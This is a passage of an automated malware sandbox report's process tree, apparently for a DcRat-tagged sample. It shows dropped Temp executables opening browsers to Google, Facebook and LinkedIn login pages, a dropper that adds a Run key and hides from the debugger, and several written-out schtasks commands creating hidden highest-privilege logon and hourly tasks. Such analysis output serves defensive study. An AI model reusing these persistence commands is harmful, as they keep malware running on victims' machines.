  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
      4⤵
      PID:4304
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff72129758,0x7fff72129768,0x7fff72129778
        5⤵
        
        PID:4400
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1968,i,2192795062386990381,17859241559999970903,131072 /prefetch:8
        5⤵
        
        PID:6176
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1968,i,2192795062386990381,17859241559999970903,131072 /prefetch:2
        5⤵
        
        PID:4120
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
      4⤵
      PID:5652
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff72129758,0x7fff72129768,0x7fff72129778
        5⤵
        
        PID:6800
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1872,i,7150242800564335513,1248670414072884575,131072 /prefetch:8
        5⤵
        
        PID:7824
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1800 --field-trial-handle=1872,i,7150242800564335513,1248670414072884575,131072 /prefetch:2
        5⤵
        
        PID:7780
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:3488
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
        5⤵
        
        PID:2464
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.0.805278637\1371817012" -parentBuildID 20221007134813 -prefsHandle 1672 -prefMapHandle 1664 -prefsLen 20873 -prefMapSize 233536 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a979574e-dca8-48c1-81c5-ccc3333c69d3} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 1784 1d2306ef358 gpu
        6⤵
        
        PID:5712
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.1.1506003246\202568201" -parentBuildID 20221007134813 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 20873 -prefMapSize 233536 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {798574c9-3a92-468c-bc3b-d3e2d1bafe66} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 2212 1d22fe37e58 socket
        6⤵
        
        PID:10088
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.2.961550395\53241211" -childID 1 -isForBrowser -prefsHandle 3364 -prefMapHandle 3360 -prefsLen 22114 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7ada61d-048a-47af-9042-9c8d56ea98da} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 3472 1d233eeb058 tab
        6⤵
        
        PID:7924
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.3.1029727740\814565129" -childID 2 -isForBrowser -prefsHandle 3736 -prefMapHandle 3732 -prefsLen 26512 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb36966a-7048-4a65-8cd7-f222ef6462d6} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 3892 1d223a62258 tab
        6⤵
        
        PID:6380
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.4.1039802589\651675652" -childID 3 -isForBrowser -prefsHandle 4640 -prefMapHandle 4636 -prefsLen 26571 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dc59f2f-28dd-4e8c-8890-6da9fdcf97d7} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 4012 1d2368a9858 tab
        6⤵
        
        PID:3744
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.5.560341374\1899509474" -childID 4 -isForBrowser -prefsHandle 4604 -prefMapHandle 4852 -prefsLen 26571 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f38c2f8-f9b7-4007-ba52-3e3e834a0497} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 4772 1d236a04d58 tab
        6⤵
        
        PID:5728
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.6.1762331673\1818682002" -childID 5 -isForBrowser -prefsHandle 5068 -prefMapHandle 5072 -prefsLen 26571 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e80776d-ed5a-4ec7-9b57-7c12fcd878c5} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 5056 1d236a06858 tab
        6⤵
        
        PID:6216
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.7.1362077814\1160345509" -childID 6 -isForBrowser -prefsHandle 5092 -prefMapHandle 5096 -prefsLen 26571 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b94a4a2-742d-489f-b673-d92b60e93631} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 5108 1d2371c1658 tab
        6⤵
        
        PID:6248
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2464.8.770348942\1443510655" -childID 7 -isForBrowser -prefsHandle 5600 -prefMapHandle 5596 -prefsLen 26571 -prefMapSize 233536 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6df1c6b4-2914-4187-a74a-712aa25c28f3} 2464 "\\.\pipe\gecko-crash-server-pipe.2464" 5612 1d233a2bd58 tab
        6⤵
        
        PID:4392
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      4⤵
      PID:6488
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
        5⤵
        
        PID:548
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      4⤵
      PID:7624
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
        5⤵
        
        PID:9176
- - C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\aGvtPtIpFtGGB6wbiv9M.exe
    "C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\aGvtPtIpFtGGB6wbiv9M.exe"
    3⤵
    PID:6664
- - C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\iVegctkyI6hPrcbtjVYb.exe
    "C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\iVegctkyI6hPrcbtjVYb.exe"
    3⤵
    PID:544
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 760
      4⤵
      Program crash
      PID:10600
- - C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\Lw8YZbPpdylQ1draaSpG.exe
    "C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\Lw8YZbPpdylQ1draaSpG.exe"
    3⤵
    PID:8124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8124 -s 760
      4⤵
      Program crash
      PID:10560
- C:\Users\Admin\AppData\Local\Temp\1000621001\dotu.exe
  "C:\Users\Admin\AppData\Local\Temp\1000621001\dotu.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:4076
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:4680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2928
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:7912
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:5884
- - C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\1gPVrKoZOfXfo4Ef8voN.exe
    "C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\1gPVrKoZOfXfo4Ef8voN.exe"
    3⤵
    PID:7784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
      4⤵
      PID:6088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:3108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2422728064136781144,3070275214930491742,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
        5⤵
        
        PID:6396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2422728064136781144,3070275214930491742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
        5⤵
        
        PID:7876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
      4⤵
      PID:7640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:3264
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
        5⤵
        
        PID:7712
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        5⤵
        
        PID:7672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:8
        5⤵
        
        PID:7924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
        5⤵
        
        PID:7340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
        5⤵
        
        PID:1464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
        5⤵
        
        PID:3524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
        5⤵
        
        PID:4684
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
        5⤵
        
        PID:2028
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
        5⤵
        
        PID:7772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
        5⤵
        
        PID:5640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
        5⤵
        
        PID:3816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
        5⤵
        
        PID:6520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
        5⤵
        
        PID:3292
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
        5⤵
        
        PID:1892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
        5⤵
        
        PID:3588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6492 /prefetch:8
        5⤵
        
        PID:8816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1992,1907567660048451162,11037623391173078592,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6504 /prefetch:8
        5⤵
        
        PID:2336
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
      4⤵
      PID:6620
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:6720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,5982727296706046440,5427203637158671818,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
        5⤵
        
        PID:5652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5982727296706046440,5427203637158671818,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:5488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:5776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,14054018667091859491,10797495150946735318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
        5⤵
        
        PID:3288
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,14054018667091859491,10797495150946735318,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        5⤵
        
        PID:512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
      4⤵
      PID:7752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:1380
